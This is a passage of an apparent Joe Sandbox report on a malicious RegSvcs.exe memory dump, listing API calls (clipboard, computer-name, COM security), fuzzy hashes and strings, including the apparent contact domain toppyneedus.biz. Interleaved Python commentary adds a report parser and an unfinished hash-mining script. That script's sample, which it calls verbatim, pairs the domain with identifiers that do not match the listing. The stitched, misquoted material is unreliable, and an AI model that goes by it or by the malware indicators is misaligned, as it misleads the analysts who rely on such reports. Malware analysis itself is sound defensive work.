                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004126DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeSecurity
                                                                            • String ID:
                                                                            • API String ID: 640775948-0
                                                                            • Opcode ID: 10f064ee220c507d915f1d424deb88b62d3e2b18beb6ee73b3b23a48d7d3b2a2
                                                                            • Instruction ID: 2bca720c1f31fde5ceeaedde1984d791ee9f0414cc4c9d79ca1630e3408cefe1
                                                                            • Opcode Fuzzy Hash: 10f064ee220c507d915f1d424deb88b62d3e2b18beb6ee73b3b23a48d7d3b2a2
                                                                            • Instruction Fuzzy Hash: 41F01A797D4701B6F2390770DD2BF5161219785F22F748329F3217D6DC8AE83A08450C
                                                                            APIs
                                                                            • GetUserDefaultUILanguage.KERNELBASE ref: 0043C692
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultLanguageUser
                                                                            • String ID:
                                                                            • API String ID: 95929093-0
                                                                            • Opcode ID: db9d752f8615cad4a15f39555ff73e6488da311daffc9517e78d12363df8cab4
                                                                            • Instruction ID: 46ed00a226e76ca485e49e74dce33b3c0cde6200119287aafed108d42e9685fd
                                                                            • Opcode Fuzzy Hash: db9d752f8615cad4a15f39555ff73e6488da311daffc9517e78d12363df8cab4
                                                                            • Instruction Fuzzy Hash: D821CD326093818FD704CF78C9C0659BBB26F4A200F4882AED65A9B382CA3489858B51
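The per-function entries above are machine-generated and repeat the same API references for overlapping functions (433205 and 433209 both reach GetComputerNameExA at 0043331D). The following Python is an added example, not part of the Joe Sandbox report: it parses these "APIs" and "Similarity" entries into records, dedupes calls by (function, ref), and annotates the two argument positions whose meaning is fixed by the Windows SDK headers: the COMPUTER_NAME_FORMAT passed to GetComputerNameExA (6 = ComputerNamePhysicalDnsDomain, 5 = ComputerNamePhysicalDnsHostname) and dwImpLevel passed to CoInitializeSecurity (3 = RPC_C_IMP_LEVEL_IMPERSONATE, the usual COM security setup before WMI queries). The record layout, function names and the SAMPLE text (lines quoted from this report) are the example's own; the constant tables are from sysinfoapi.h and rpcdce.h.

```python
"""Parser for the per-function 'APIs' / 'Similarity' entries of a Joe Sandbox
report (added example; the record layout is this example's own assumption)."""
import re
from dataclasses import dataclass, field

# COMPUTER_NAME_FORMAT (Windows SDK, sysinfoapi.h): first argument of GetComputerNameExA.
COMPUTER_NAME_FORMAT = {
    0: "ComputerNameNetBIOS", 1: "ComputerNameDnsHostname",
    2: "ComputerNameDnsDomain", 3: "ComputerNameDnsFullyQualified",
    4: "ComputerNamePhysicalNetBIOS", 5: "ComputerNamePhysicalDnsHostname",
    6: "ComputerNamePhysicalDnsDomain", 7: "ComputerNamePhysicalDnsFullyQualified",
}
# RPC_C_IMP_LEVEL_* (rpcdce.h): sixth argument (dwImpLevel) of CoInitializeSecurity.
RPC_C_IMP_LEVEL = {0: "DEFAULT", 1: "ANONYMOUS", 2: "IDENTIFY", 3: "IMPERSONATE", 4: "DELEGATE"}

# "• Func.MODULE(arg,arg), ref: 0043331D" and the argument-less "• Func.MODULE ref: 0043C692".
API_RE = re.compile(
    r"•\s*(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
# "• Key: value" lines of the Similarity block (API ID, Opcode ID, fuzzy hashes, ...).
FIELD_RE = re.compile(r"•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    func: str
    module: str
    ref: int
    args: list                              # int for hex literals, None for '?' (unknown)
    notes: dict = field(default_factory=dict)  # argument index -> SDK constant name


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    api_id: str = ""
    string_id: str = ""
    instruction_fuzzy_hash: str = ""
    calls: list = field(default_factory=list)


def _annotate(call: ApiCall) -> None:
    """Name the argument values whose meaning the SDK fixes."""
    if call.func == "GetComputerNameExA" and call.args and call.args[0] in COMPUTER_NAME_FORMAT:
        call.notes[0] = COMPUTER_NAME_FORMAT[call.args[0]]
    if call.func == "CoInitializeSecurity" and len(call.args) > 5 and call.args[5] in RPC_C_IMP_LEVEL:
        call.notes[5] = "RPC_C_IMP_LEVEL_" + RPC_C_IMP_LEVEL[call.args[5]]


def parse_api_line(line: str):
    m = API_RE.search(line)
    if not m:
        return None
    raw = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
    args = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None for a in raw]
    call = ApiCall(m.group("func"), m.group("module"), int(m.group("ref"), 16), args)
    _annotate(call)
    return call


def parse_report(text: str) -> list:
    """One FunctionRecord per entry; the 'Instruction Fuzzy Hash' line closes an entry."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        call = parse_api_line(line)
        if call:
            cur.calls.append(call)
            continue
        m = FIELD_RE.search(line)
        if not m:
            continue
        key, val = m.group("key"), m.group("val").strip()
        if key == "Opcode ID":
            cur.opcode_id = val
        elif key == "API ID":
            cur.api_id = val
        elif key == "String ID":
            cur.string_id = val
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_fuzzy_hash = val
            records.append(cur)
            cur = FunctionRecord()
    return records


def unique_calls(records: list) -> dict:
    """Dedupe by (function, ref): overlapping functions list the same call twice."""
    out = {}
    for r in records:
        for c in r.calls:
            out.setdefault((c.func, c.ref), c)
    return out


# Lines quoted from this report's entries (three of the functions above).
SAMPLE = """\
APIs
• FreeLibrary.KERNEL32(?), ref: 00433235
• GetComputerNameExA.KERNELBASE(00000006,DCF3E703,00000100), ref: 0043331D
Similarity
• API ID: ComputerFreeLibraryName
• String ID: GP
• Opcode ID: 6563f58ce82020090adf1b72062c6c9ded0c1e7760ea96bc79605ec8a0e8a161
• Instruction Fuzzy Hash: D831483151C3918BD7298F3D88143ABBBE16B9B305F1486AED4EACB2D1CA3805058743
APIs
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004126C2
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004126DA
• API ID: InitializeSecurity
• Opcode ID: 10f064ee220c507d915f1d424deb88b62d3e2b18beb6ee73b3b23a48d7d3b2a2
• Instruction Fuzzy Hash: 41F01A797D4701B6F2390770DD2BF5161219785F22F748329F3217D6DC8AE83A08450C
APIs
• GetUserDefaultUILanguage.KERNELBASE ref: 0043C692
• API ID: DefaultLanguageUser
• Instruction Fuzzy Hash: D821CD326093818FD704CF78C9C0659BBB26F4A200F4882AED65A9B382CA3489858B51
"""

if __name__ == "__main__":
    for (func, ref), call in unique_calls(parse_report(SAMPLE)).items():
        print(f"{ref:08X} {func}.{call.module} {call.args} {call.notes}")
```

Run against the full report text instead of SAMPLE to get one annotated call per reference site; the Instruction Fuzzy Hash values collected per record are what you would feed into a similarity search against other samples.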
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00443C09
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ForegroundWindow
                                                                            • String ID:
                                                                            • API String ID: 2020703349-0
                                                                            • Opcode ID: 10b60b6185b2966b14e8877d9f6f24751d04f8d0b9f996907109f6e2cbf72ad3
                                                                            • Instruction ID: 3035aa517afaf49a31d507dae9bbb53c902ec0c13c4d7644fc63a29e793abeac
                                                                            • Opcode Fuzzy Hash: 10b60b6185b2966b14e8877d9f6f24751d04f8d0b9f996907109f6e2cbf72ad3
                                                                            • Instruction Fuzzy Hash: 29F0F4B2A442418BD7089F35DC4595777E1EB96305B18883EE152C6785CA3CD506CB0A
                                                                            APIs
                                                                            • RtlReAllocateHeap.NTDLL(?,00000000,0043F9EF,011C7650,?,011C7650,0043F9EF,00000000,00004000,?,?,?,?,?,011C7650,?), ref: 00443A82
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 650999bfba410ea02efb495c78b9c1864137618d8ac633baae9911caf181d38e
                                                                            • Instruction ID: f90f3096ab9ff0e24ff0c360bcc3477f15b7a842ab67e250a51fee1cdc8694ae
                                                                            • Opcode Fuzzy Hash: 650999bfba410ea02efb495c78b9c1864137618d8ac633baae9911caf181d38e
                                                                            • Instruction Fuzzy Hash: 4BE02B36514210EFD2006F28BC06A1B7668AFC2B65F03043AF805A6125DF38F80A85AE
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            • Opcode ID: fe8fcd6a7de0a7bfd82206f5bd37363747d380055324accfbb0b2c53c99cd6e3
                                                                            • Instruction ID: d209646a7f178b22ca4a499e8b0929f7de8c74b30a8c66eca02436d4238fab1b
                                                                            • Opcode Fuzzy Hash: fe8fcd6a7de0a7bfd82206f5bd37363747d380055324accfbb0b2c53c99cd6e3
                                                                            • Instruction Fuzzy Hash: 2CF0F9B5209702CFE311CF25C45430BBBE6BBC4314F25891CE4944B355D7B5AA498FC2
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            • Opcode ID: 1100639bab777f0c826d7f7131cd09f17c370fecf9b368d3c5a73d3e82f56921
                                                                            • Instruction ID: 237b9997d780b682eb02d192c03a67301cef8a3512a355dd374ab3ae68ece661
                                                                            • Opcode Fuzzy Hash: 1100639bab777f0c826d7f7131cd09f17c370fecf9b368d3c5a73d3e82f56921
                                                                            • Instruction Fuzzy Hash: 4AF0B7B46087018FD354DF28D5A875BBBE0FB89304F10881CE1998B3A0CBB5A948CF82
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 00441F87
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00443C09
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: ForegroundWindow
                                                                            • String ID:
                                                                            • API String ID: 2020703349-0
                                                                            APIs
                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 00410CA3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?,?,0040BCF8,8D8CB392), ref: 00441F40
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0

                                                                            Non-executed Functions

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: toppyneedus.biz$@<F$LB$`<f$h4n$lb$pv$t&j
                                                                            • API String ID: 0-527765425
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "$')%$CBA@$CBA@$CBA@$CBA@$CBA@
                                                                            • API String ID: 0-1648101650
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                            • String ID:
                                                                            • API String ID: 1494355150-0
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042DEB0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID: $B$^_
                                                                            • API String ID: 237503144-1065896459
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042DEB0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID: $B$^_
                                                                            • API String ID: 237503144-1065896459
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 7O,I$:_*Y$>C>M$rs
                                                                            • API String ID: 0-576127746
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 67$CBA@$LINO$LINO$XnQl$e&%v
                                                                            • API String ID: 0-1626510912
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,q s$1y){$E{fq$Q$rSmP$~S}M
                                                                            • API String ID: 0-2467998722
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .s7~$.s7~$2s7~$2s7~$m>?<$~2~0
                                                                            • API String ID: 0-157436929
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: !$8CpA$8CpA$RCpA$RCpA$57
                                                                            • API String ID: 0-1597130363
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "e2g$/y;{$1i4k$3a=c$5]2_
                                                                            • API String ID: 0-1179253005
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?), ref: 0042FE8C
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?), ref: 0042FEB8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID:
                                                                            • API String ID: 237503144-0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%-@$?%!1$G-HM$J
                                                                            • API String ID: 0-3609582815
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 055+$45J$$p>?8$vM/=
                                                                            • API String ID: 0-1721636607
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: CBA@$WTTJ$f
                                                                            • API String ID: 2994545307-3584505301
                                                                            • Instruction Fuzzy Hash: 09F0AF29A0811586C7188F54C8A1373B2B1FF86350B04947BEC83A7B99F77C9C09E75E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: CBA@
                                                                            • API String ID: 2994545307-1145392821
                                                                            • Opcode ID: 5a0c7249889e4a93c58d4a641c4a64c8f9872d01d569578c8bb9795b2bb51817
                                                                            • Instruction ID: 09ad8aee62d3c20d21d062b8474832d877d0b06331463a38a517a7d65a326111
                                                                            • Opcode Fuzzy Hash: 5a0c7249889e4a93c58d4a641c4a64c8f9872d01d569578c8bb9795b2bb51817
                                                                            • Instruction Fuzzy Hash: 3BF0A77060C2104BE304DB28A955937F7E5DB47338F545A1DE5AAA72D2D228AC56870A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: baae5f0e30978c621d64719c1dfbab92b3e01a22dcb1dc03645422f7419631c9
                                                                            • Instruction ID: 45f85c51ffb39c1c35df02cc71f6c2b8cd25caf0d8e2108a05e41e46f584b8b2
                                                                            • Opcode Fuzzy Hash: baae5f0e30978c621d64719c1dfbab92b3e01a22dcb1dc03645422f7419631c9
                                                                            • Instruction Fuzzy Hash: 0622A4726083118BC725DE18D9406ABB3E1FFC4319F19893ED986A73C5D738A8658B47
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a21693e68d6c2dc68f3771ac8f6abb2374044a033a8a55580f35bfe2aebe3a52
                                                                            • Instruction ID: fba20f1fd1809ee57f04a952d383ac98b277ec697ebd25121fed1e7f698519ed
                                                                            • Opcode Fuzzy Hash: a21693e68d6c2dc68f3771ac8f6abb2374044a033a8a55580f35bfe2aebe3a52
                                                                            • Instruction Fuzzy Hash: A222BBB5A083418FC364CF29C480A9AFBE1BFC8714F55892EE999D7311E770E9458F86
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e2f57fe3b9f43da44e84c3b486574c5795c1a4486e36e252ce4a529013125e2a
                                                                            • Instruction ID: c0beae02e2afb8fc3f7bd56478010165f8edd20768fc1a93718a7573f6d62d31
                                                                            • Opcode Fuzzy Hash: e2f57fe3b9f43da44e84c3b486574c5795c1a4486e36e252ce4a529013125e2a
                                                                            • Instruction Fuzzy Hash: 02C10F36A18350CFD704DF39E89026BB7E2FBCA311F1A887ED989C7251E634D9468B45
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dafbec1d464ecd5e00f246eb6c6bf53cc65ae8098bb7db74f9c6550991923cc6
                                                                            • Instruction ID: b693ec94dd037d92688a7630cfde83b878ce35c756758b36ad83687ce2c4efd1
                                                                            • Opcode Fuzzy Hash: dafbec1d464ecd5e00f246eb6c6bf53cc65ae8098bb7db74f9c6550991923cc6
                                                                            • Instruction Fuzzy Hash: F0A16B72B483208BD318CF24D89276BB3E1EFE5310F49D56DE8859B391E7789905C74A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 28b8e8adf88234984df0464e0f51b7bd8c391eb7f3dde45b96e1c36b640d3c84
                                                                            • Instruction ID: 7cdd8ca2d8075aafc66ab920a3b68e0b8f1e5beb512974ecdfb5d9a624332584
                                                                            • Opcode Fuzzy Hash: 28b8e8adf88234984df0464e0f51b7bd8c391eb7f3dde45b96e1c36b640d3c84
                                                                            • Instruction Fuzzy Hash: 1D61F1B1A0C3108BD704DF24E89122BB7B2EFE2358F18892DE4C59B391E739D506C75A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 23e122f10f744cb6c9b0bc1563ed4165fd24b61414c2aefdeb7ef4d7599abf8f
                                                                            • Instruction ID: 8f81dde8399a6a75da52ab65edcef000bfbae5987a417ba31876f76159fa0020
                                                                            • Opcode Fuzzy Hash: 23e122f10f744cb6c9b0bc1563ed4165fd24b61414c2aefdeb7ef4d7599abf8f
                                                                            • Instruction Fuzzy Hash: C851F0B1A0C3108BD704DF24E89126BB7B2EFE2358F18892DE4C59B391E739D506C75A
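The listing repeats one block per function recovered from the RegSvcs.exe dump at image base 0x400000, and most blocks carry nothing but hashes. Two things in it are worth pulling out by script rather than by eye: the handful of String IDs that are not empty (one of them, toppyneedus.biz, is a host name), and Instruction Fuzzy Hashes that differ in only a few hex digits between blocks (the two blocks immediately above differ in five digits out of seventy, which is what a near-identical function pair looks like). The following is an added example, not code from the Joe Sandbox report; SAMPLE reproduces three blocks from the listing verbatim. Two things are assumptions not confirmed by the page: that Joe Sandbox joins multiple API ID / String ID entries with `$`, and that a nibble-wise Hamming distance is an acceptable stand-in for the sandbox's own similarity score.

```python
"""Mine a Joe Sandbox function-signature listing for hunting data.
Added example, not code from the report; SAMPLE is three blocks copied from the listing.
Assumed: '$' separates multi-entry fields; nibble distance approximates the sandbox score."""
import re
from dataclasses import dataclass, field
from itertools import combinations

SAMPLE = """\
Memory Dump Source
• Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: toppyneedus.biz
• API String ID: 0-1318037778
• Opcode ID: 866067ea8b6d25e48e586b60208ec48b4e6e2469098e3cbea04eff5a7501ee78
• Instruction ID: ec4d0669c556db09767864a2200042a921757abea953f7d6095fd373d4e98f3a
• Opcode Fuzzy Hash: 866067ea8b6d25e48e586b60208ec48b4e6e2469098e3cbea04eff5a7501ee78
• Instruction Fuzzy Hash: 09F0AF29A0811586C7188F54C8A1373B2B1FF86350B04947BEC83A7B99F77C9C09E75E
Memory Dump Source
• Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 28b8e8adf88234984df0464e0f51b7bd8c391eb7f3dde45b96e1c36b640d3c84
• Instruction ID: 7cdd8ca2d8075aafc66ab920a3b68e0b8f1e5beb512974ecdfb5d9a624332584
• Opcode Fuzzy Hash: 28b8e8adf88234984df0464e0f51b7bd8c391eb7f3dde45b96e1c36b640d3c84
• Instruction Fuzzy Hash: 1D61F1B1A0C3108BD704DF24E89122BB7B2EFE2358F18892DE4C59B391E739D506C75A
Memory Dump Source
• Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23e122f10f744cb6c9b0bc1563ed4165fd24b61414c2aefdeb7ef4d7599abf8f
• Instruction ID: 8f81dde8399a6a75da52ab65edcef000bfbae5987a417ba31876f76159fa0020
• Opcode Fuzzy Hash: 23e122f10f744cb6c9b0bc1563ed4165fd24b61414c2aefdeb7ef4d7599abf8f
• Instruction Fuzzy Hash: C851F0B1A0C3108BD704DF24E89126BB7B2EFE2358F18892DE4C59B391E739D506C75A
"""

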